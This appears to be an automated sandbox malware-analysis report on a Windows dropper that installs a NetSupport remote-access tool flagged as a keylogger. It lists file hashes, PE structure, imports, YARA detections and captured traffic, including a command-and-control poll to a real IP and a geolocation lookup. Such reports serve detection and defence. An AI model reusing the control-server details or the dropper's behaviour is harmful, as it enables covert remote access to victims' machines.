                                                                                                            SHA-512:1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
                                                                                                            Malicious:false
                                                                                                            Preview:32.7767,-96.797
                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):7.940357211110643
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:file.exe
                                                                                                            File size:2'137'944 bytes
                                                                                                            MD5:17f5a1ae03a0ff4eb038527de02e8860
                                                                                                            SHA1:66e04a8d2fbe629115cad3f39bedc33256a8f35a
                                                                                                            SHA256:6a8f94da45c0b3b791bbfb71b2e9a7cc6bd5dd777da0655ebc3137ad4070c72f
                                                                                                            SHA512:4a70492bfc1c65e58631628c7edfe0f993bb155a63596f611bdfcc131509c9f92e204289690f83648d099fc6afee3a6d828e8cc506b1a50836b3396a9651b2d9
                                                                                                            SSDEEP:49152:VIfX6Rm0EkHbG+tw6NbHHBp7k5hhelN6YawnqzKwgVRD:VI/PYwYt5ShAiYawvw2
                                                                                                            TLSH:20A52302F9C6C5B2D53308360A68AB55797DBF342F28D96FA78D5E1ACA301917338A53
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~..............b.......b..<....b......)^...................................................... ....... .......%....... ......
                                                                                                            Icon Hash:1515d4d4442f2d2d
                                                                                                            Entrypoint:0x41d779
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:5
                                                                                                            OS Version Minor:1
                                                                                                            File Version Major:5
                                                                                                            File Version Minor:1
                                                                                                            Subsystem Version Major:5
                                                                                                            Subsystem Version Minor:1
                                                                                                            Import Hash:00be6e6c4f9e287672c8301b72bdabf3
                                                                                                            Instruction
                                                                                                            call 00007F93848C481Fh
                                                                                                            jmp 00007F93848C4213h
                                                                                                            cmp ecx, dword ptr [0043A1C8h]
                                                                                                            jne 00007F93848C4385h
                                                                                                            ret
                                                                                                            jmp 00007F93848C4996h
                                                                                                            and dword ptr [ecx+04h], 00000000h
                                                                                                            mov eax, ecx
                                                                                                            and dword ptr [ecx+08h], 00000000h
                                                                                                            mov dword ptr [ecx+04h], 00430FE8h
                                                                                                            mov dword ptr [ecx], 00431994h
                                                                                                            ret
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            push esi
                                                                                                            push dword ptr [ebp+08h]
                                                                                                            mov esi, ecx
                                                                                                            call 00007F93848B791Dh
                                                                                                            mov dword ptr [esi], 004319A0h
                                                                                                            mov eax, esi
                                                                                                            pop esi
                                                                                                            pop ebp
                                                                                                            retn 0004h
                                                                                                            and dword ptr [ecx+04h], 00000000h
                                                                                                            mov eax, ecx
                                                                                                            and dword ptr [ecx+08h], 00000000h
                                                                                                            mov dword ptr [ecx+04h], 004319A8h
                                                                                                            mov dword ptr [ecx], 004319A0h
                                                                                                            ret
                                                                                                            lea eax, dword ptr [ecx+04h]
                                                                                                            mov dword ptr [ecx], 00431988h
                                                                                                            push eax
                                                                                                            call 00007F93848C752Eh
                                                                                                            pop ecx
                                                                                                            ret
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            push esi
                                                                                                            mov esi, ecx
                                                                                                            lea eax, dword ptr [esi+04h]
                                                                                                            mov dword ptr [esi], 00431988h
                                                                                                            push eax
                                                                                                            call 00007F93848C7517h
                                                                                                            test byte ptr [ebp+08h], 00000001h
                                                                                                            pop ecx
                                                                                                            je 00007F93848C438Ch
                                                                                                            push 0000000Ch
                                                                                                            push esi
                                                                                                            call 00007F93848C3952h
                                                                                                            pop ecx
                                                                                                            pop ecx
                                                                                                            mov eax, esi
                                                                                                            pop esi
                                                                                                            pop ebp
                                                                                                            retn 0004h
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            sub esp, 0Ch
                                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                                            call 00007F93848C42EEh
                                                                                                            push 00437B58h
                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                            push eax
                                                                                                            call 00007F93848C6C16h
                                                                                                            int3
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            sub esp, 0Ch
                                                                                                            Programming Language:
                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                            • [C++] VS2015 UPD3.1 build 24215
                                                                                                            • [EXP] VS2015 UPD3.1 build 24215
                                                                                                            • [RES] VS2015 UPD3 build 24213
                                                                                                            • [LNK] VS2015 UPD3.1 build 24215
                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x38cd00x34.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x38d040x3c.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000xe034.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000x1fd0.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x36ee00x54.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x319280x40.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x300000x25c.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x382540x120.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000x2e8640x2ea008c2dd3ebce78edeed565107466ae1d3eFalse0.5908595844504021data6.693477406609911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rdata0x300000x9aac0x9c00b8d3a709e8e2861298e51f270be0f883False0.45718149038461536data5.133828516884417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .data0x3a0000x213d00xc007a066b052b7178cd1388c71d17dec570False0.2789713541666667data3.2428863859698565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .gfids0x5c0000xe80x2000a8129f1f5d2e8ddcb61343ecd6f891aFalse0.33984375data2.0959167744603624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0x5d0000xe0340xe200d62594e063ef25acc085c21831d77a75False0.6341779590707964data6.802287495720703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0x6c0000x1fd00x2000983e78af74da826d9233ebaa3055869aFalse0.8060302734375data6.687357530503152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            PNG0x5d6440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                                                            PNG0x5e18c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                                                            RT_ICON0x5f7380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                                                                            RT_ICON0x5fca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                                                                            RT_ICON0x605480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                                                                            RT_ICON0x613f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                                                                            RT_ICON0x618580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                                                                            RT_ICON0x629000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                                                                            RT_ICON0x64ea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                                                                            RT_DIALOG0x68c1c0x2a2data0.5296735905044511
                                                                                                            RT_DIALOG0x68ec00x13adata0.6624203821656051
                                                                                                            RT_DIALOG0x68ffc0xf2data0.71900826446281
                                                                                                            RT_DIALOG0x690f00x14edata0.5868263473053892
                                                                                                            RT_DIALOG0x692400x318data0.476010101010101
                                                                                                            RT_DIALOG0x695580x24adata0.6262798634812287
                                                                                                            RT_STRING0x697a40x1fcdata0.421259842519685
                                                                                                            RT_STRING0x699a00x246data0.41924398625429554
                                                                                                            RT_STRING0x69be80x1dcdata0.5105042016806722
                                                                                                            RT_STRING0x69dc40xdcdata0.65
                                                                                                            RT_STRING0x69ea00x468data0.375
                                                                                                            RT_STRING0x6a3080x164data0.5056179775280899
                                                                                                            RT_STRING0x6a46c0xe4data0.6359649122807017
                                                                                                            RT_STRING0x6a5500x158data0.4563953488372093
                                                                                                            RT_STRING0x6a6a80xe8data0.5948275862068966
                                                                                                            RT_STRING0x6a7900xe6data0.5695652173913044
                                                                                                            RT_GROUP_ICON0x6a8780x68data0.7019230769230769
                                                                                                            RT_MANIFEST0x6a8e00x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333
                                                                                                            DLLImport
                                                                                                            KERNEL32.dllGetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                                                                                            gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-10-25T18:05:04.643603+02002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.449730185.215.113.67443TCP
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Oct 25, 2024 18:05:04.643603086 CEST49730443192.168.2.4185.215.113.67
                                                                                                            Oct 25, 2024 18:05:04.643639088 CEST44349730185.215.113.67192.168.2.4
                                                                                                            Oct 25, 2024 18:05:04.643722057 CEST49730443192.168.2.4185.215.113.67
                                                                                                            Oct 25, 2024 18:05:05.047717094 CEST49730443192.168.2.4185.215.113.67
                                                                                                            Oct 25, 2024 18:05:05.047758102 CEST44349730185.215.113.67192.168.2.4
                                                                                                            Oct 25, 2024 18:05:05.047822952 CEST44349730185.215.113.67192.168.2.4
                                                                                                            Oct 25, 2024 18:05:05.400188923 CEST4973180192.168.2.4104.26.0.231
                                                                                                            Oct 25, 2024 18:05:05.406349897 CEST8049731104.26.0.231192.168.2.4
                                                                                                            Oct 25, 2024 18:05:05.406451941 CEST4973180192.168.2.4104.26.0.231
                                                                                                            Oct 25, 2024 18:05:05.496711969 CEST4973180192.168.2.4104.26.0.231
                                                                                                            Oct 25, 2024 18:05:05.502248049 CEST8049731104.26.0.231192.168.2.4
                                                                                                            Oct 25, 2024 18:05:06.220741987 CEST8049731104.26.0.231192.168.2.4
                                                                                                            Oct 25, 2024 18:05:06.220825911 CEST4973180192.168.2.4104.26.0.231
                                                                                                            Oct 25, 2024 18:06:54.879106045 CEST4973180192.168.2.4104.26.0.231
                                                                                                            Oct 25, 2024 18:06:54.902709007 CEST8049731104.26.0.231192.168.2.4
                                                                                                            Oct 25, 2024 18:06:54.902764082 CEST4973180192.168.2.4104.26.0.231
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Oct 25, 2024 18:05:05.230427980 CEST5084053192.168.2.41.1.1.1
                                                                                                            Oct 25, 2024 18:05:05.240892887 CEST53508401.1.1.1192.168.2.4
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Oct 25, 2024 18:05:05.230427980 CEST192.168.2.41.1.1.10x1ab2Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Oct 25, 2024 18:05:05.240892887 CEST1.1.1.1192.168.2.40x1ab2No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                            Oct 25, 2024 18:05:05.240892887 CEST1.1.1.1192.168.2.40x1ab2No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                            Oct 25, 2024 18:05:05.240892887 CEST1.1.1.1192.168.2.40x1ab2No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                            • 185.215.113.67connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                            • geo.netsupportsoftware.com
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.449730185.215.113.674437716C:\Users\Public\Pictures\bild.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 25, 2024 18:05:05.047717094 CEST220OUTPOST http://185.215.113.67/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 185.215.113.67Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                            Data Raw:
                                                                                                            Data Ascii:


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.449731104.26.0.231807716C:\Users\Public\Pictures\bild.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 25, 2024 18:05:05.496711969 CEST118OUTGET /location/loca.asp HTTP/1.1
                                                                                                            Host: geo.netsupportsoftware.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Oct 25, 2024 18:05:06.220741987 CEST935INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 25 Oct 2024 16:05:06 GMT
                                                                                                            Content-Type: text/html; Charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: keep-alive
                                                                                                            CF-Ray: 8d83723829cb2e19-DFW
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Cache-Control: private
                                                                                                            Set-Cookie: ASPSESSIONIDQSBRCBDR=ICCHAPLBMJCAGCIINAINEGKD; path=/
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                            Vary: Accept-Encoding
                                                                                                            cf-apo-via: origin,host
                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sdd0v2ohTNdG0TD%2B964khUrET9ro92Ps240KKxXewBSd0%2BuiIHCsb%2BpP%2BqE0zzE79D2Q0V%2B7x5oY8oowNPkGuYQRyQCvVoaBEL5eDcssH13LP5lNAmVEkT0Ktx2ZWTo49F3fkToW3v8Rjt2d"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: f32.7767,-96.7970


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:12:05:02
                                                                                                            Start date:25/10/2024
                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                            Imagebase:0x440000
                                                                                                            File size:2'137'944 bytes
                                                                                                            MD5 hash:17F5A1AE03A0FF4EB038527DE02E8860
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:1
                                                                                                            Start time:12:05:03
                                                                                                            Start date:25/10/2024
                                                                                                            Path:C:\Users\Public\Pictures\bild.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\Public\Pictures\bild.exe"
                                                                                                            Imagebase:0x220000
                                                                                                            File size:105'848 bytes
                                                                                                            MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.4178457146.0000000000222000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000000.1735795513.0000000000222000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Pictures\bild.exe, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 29%, ReversingLabs
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:10.5%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:9.7%
                                                                                                              Total number of Nodes:1492
                                                                                                              Total number of Limit Nodes:24
                                                                                                              execution_graph 23853 459646 92 API calls 23887 461b40 5 API calls 2 library calls 21960 459b4f 21961 459b59 __EH_prolog 21960->21961 22120 4412e7 21961->22120 21964 45a230 22210 45b8bc 21964->22210 21965 459b9b 21968 459c11 21965->21968 21969 459ba8 21965->21969 22027 459b87 21965->22027 21972 459cb0 GetDlgItemTextW 21968->21972 21977 459c2b 21968->21977 21973 459bad 21969->21973 22104 459be4 21969->22104 21970 45a25c 21975 45a265 SendDlgItemMessageW 21970->21975 21976 45a276 GetDlgItem SendMessageW 21970->21976 21971 45a24e SendMessageW 21971->21970 21974 459ce7 21972->21974 21972->22104 21982 44d142 54 API calls 21973->21982 21973->22027 21980 459cff GetDlgItem 21974->21980 22117 459cf0 21974->22117 21975->21976 22228 458b8e GetCurrentDirectoryW 21976->22228 21981 44d142 54 API calls 21977->21981 21978 459c05 KiUserCallbackDispatcher 21978->22027 21985 459d13 SendMessageW SendMessageW 21980->21985 21986 459d39 SetFocus 21980->21986 21987 459c4d SetDlgItemTextW 21981->21987 21983 459bc7 21982->21983 22250 441227 SHGetMalloc 21983->22250 21984 45a2a8 GetDlgItem 21989 45a2c7 SetWindowTextW 21984->21989 21990 45a2c1 21984->21990 21985->21986 21992 459d49 21986->21992 22002 459d55 21986->22002 21991 459c5b 21987->21991 22229 458fc8 GetClassNameW 21989->22229 21990->21989 22000 459c68 GetMessageW 21991->22000 22010 459c8e TranslateMessage DispatchMessageW 21991->22010 21991->22027 21996 44d142 54 API calls 21992->21996 21993 459bce 21998 459bd2 SetDlgItemTextW 21993->21998 21993->22027 21994 45a1d0 21999 44d142 54 API calls 21994->21999 21997 459d53 21996->21997 22130 45b70e GetDlgItem 21997->22130 21998->22027 22003 45a1e0 SetDlgItemTextW 21999->22003 22000->21991 22000->22027 22008 44d142 54 API calls 22002->22008 22006 45a1f4 22003->22006 22013 44d142 54 API calls 22006->22013 22012 459d87 22008->22012 22009 459daa 22138 449cce 22009->22138 22010->21991 22011 45a312 22016 45a342 22011->22016 22020 44d142 54 API calls 22011->22020 22017 443f5b _swprintf 51 API calls 22012->22017 22018 45a21d 22013->22018 22015 45aa45 91 API calls 22015->22011 22026 45aa45 91 API calls 22016->22026 22068 45a3fa 22016->22068 22017->21997 22021 44d142 54 API calls 22018->22021 22025 45a325 SetDlgItemTextW 22020->22025 22021->22027 22022 45a4aa 22028 45a4b3 EnableWindow 22022->22028 22029 45a4bc 22022->22029 22023 459de6 22144 459023 SetCurrentDirectoryW 22023->22144 22024 459ddf GetLastError 22024->22023 22031 44d142 54 API calls 22025->22031 22032 45a35d 22026->22032 22028->22029 22033 45a4d9 22029->22033 22259 4412a4 GetDlgItem EnableWindow 22029->22259 22035 45a339 SetDlgItemTextW 22031->22035 22036 45a36f 22032->22036 22056 45a394 22032->22056 22041 45a500 22033->22041 22049 45a4f8 SendMessageW 22033->22049 22034 459dfc 22039 459e05 GetLastError 22034->22039 22040 459e0f 22034->22040 22035->22016 22257 45859c 6 API calls 22036->22257 22038 45a3ed 22044 45aa45 91 API calls 22038->22044 22039->22040 22048 459e8a 22040->22048 22052 459e9a 22040->22052 22053 459e27 GetTickCount 22040->22053 22041->22027 22045 44d142 54 API calls 22041->22045 22043 45a4cf 22260 4412a4 GetDlgItem EnableWindow 22043->22260 22044->22068 22050 45a519 SetDlgItemTextW 22045->22050 22046 45a388 22046->22056 22051 45a0d3 22048->22051 22048->22052 22049->22041 22050->22027 22163 4412c2 GetDlgItem ShowWindow 22051->22163 22058 459eb2 GetModuleFileNameW 22052->22058 22059 45a06e 22052->22059 22145 443f5b 22053->22145 22054 45a488 22258 45859c 6 API calls 22054->22258 22056->22038 22063 45aa45 91 API calls 22056->22063 22251 44de7c 73 API calls 22058->22251 22067 44d142 54 API calls 22059->22067 22059->22104 22061 45a4a7 22061->22022 22062 44d142 54 API calls 22062->22068 22069 45a3c2 22063->22069 22064 45a0e3 22164 4412c2 GetDlgItem ShowWindow 22064->22164 22066 459e44 22148 4494f1 22066->22148 22072 45a082 22067->22072 22068->22022 22068->22054 22068->22062 22069->22038 22073 45a3cb DialogBoxParamW 22069->22073 22071 459edc 22075 443f5b _swprintf 51 API calls 22071->22075 22077 443f5b _swprintf 51 API calls 22072->22077 22073->22038 22073->22104 22074 45a0ed 22165 44d142 22074->22165 22076 459efe CreateFileMappingW 22075->22076 22081 459f60 GetCommandLineW 22076->22081 22082 459fdd __vswprintf_c_l 22076->22082 22083 45a0a0 22077->22083 22087 459f71 22081->22087 22085 459fe8 ShellExecuteExW 22082->22085 22097 44d142 54 API calls 22083->22097 22084 459e6a 22088 459e71 GetLastError 22084->22088 22089 459e78 22084->22089 22090 45a005 22085->22090 22252 4597e4 SHGetMalloc 22087->22252 22088->22089 22156 449437 22089->22156 22107 45a048 22090->22107 22113 45a034 Sleep 22090->22113 22091 45a10b SetDlgItemTextW GetDlgItem 22094 45a124 GetWindowLongW SetWindowLongW 22091->22094 22095 45a13c 22091->22095 22094->22095 22173 45aa45 22095->22173 22096 459f8d 22253 4597e4 SHGetMalloc 22096->22253 22097->22104 22101 459f99 22254 4597e4 SHGetMalloc 22101->22254 22102 45aa45 91 API calls 22105 45a158 22102->22105 22104->21978 22104->22027 22198 45bc78 22105->22198 22106 459fa5 22255 44dfde 73 API calls ___scrt_fastfail 22106->22255 22107->22059 22110 45a05e UnmapViewOfFile CloseHandle 22107->22110 22110->22059 22112 459fbc MapViewOfFile 22112->22082 22113->22090 22113->22107 22117->21994 22117->22104 22121 4412f0 22120->22121 22122 441349 22120->22122 22124 441356 22121->22124 22261 44ced7 22121->22261 22279 44ceb0 GetWindowLongW SetWindowLongW 22122->22279 22124->21964 22124->21965 22124->22027 22127 441325 GetDlgItem 22127->22124 22128 441335 22127->22128 22128->22124 22129 44133b SetWindowTextW 22128->22129 22129->22124 22131 45b76a SendMessageW SendMessageW 22130->22131 22132 45b73a 22130->22132 22133 45b7c1 SendMessageW SendMessageW SendMessageW 22131->22133 22134 45b7a2 22131->22134 22135 45b745 ShowWindow SendMessageW SendMessageW 22132->22135 22136 45b7ec SendMessageW 22133->22136 22137 45b80b SendMessageW 22133->22137 22134->22133 22135->22131 22136->22137 22137->22009 22140 449cd8 22138->22140 22139 449d92 22139->22023 22139->22024 22140->22139 22141 449d69 22140->22141 22293 449e86 22140->22293 22141->22139 22142 449e86 9 API calls 22141->22142 22142->22139 22144->22034 22340 443f2e 22145->22340 22149 4494fb 22148->22149 22150 449565 CreateFileW 22149->22150 22151 449559 22149->22151 22150->22151 22152 4495b7 22151->22152 22153 44b275 2 API calls 22151->22153 22152->22084 22154 44959e 22153->22154 22154->22152 22155 4495a2 CreateFileW 22154->22155 22155->22152 22157 44945b 22156->22157 22162 44946c 22156->22162 22158 449467 22157->22158 22159 44946e 22157->22159 22157->22162 22419 4495ea 22158->22419 22424 4494a3 22159->22424 22162->22048 22163->22064 22164->22074 22166 44d172 22165->22166 22167 44d191 LoadStringW 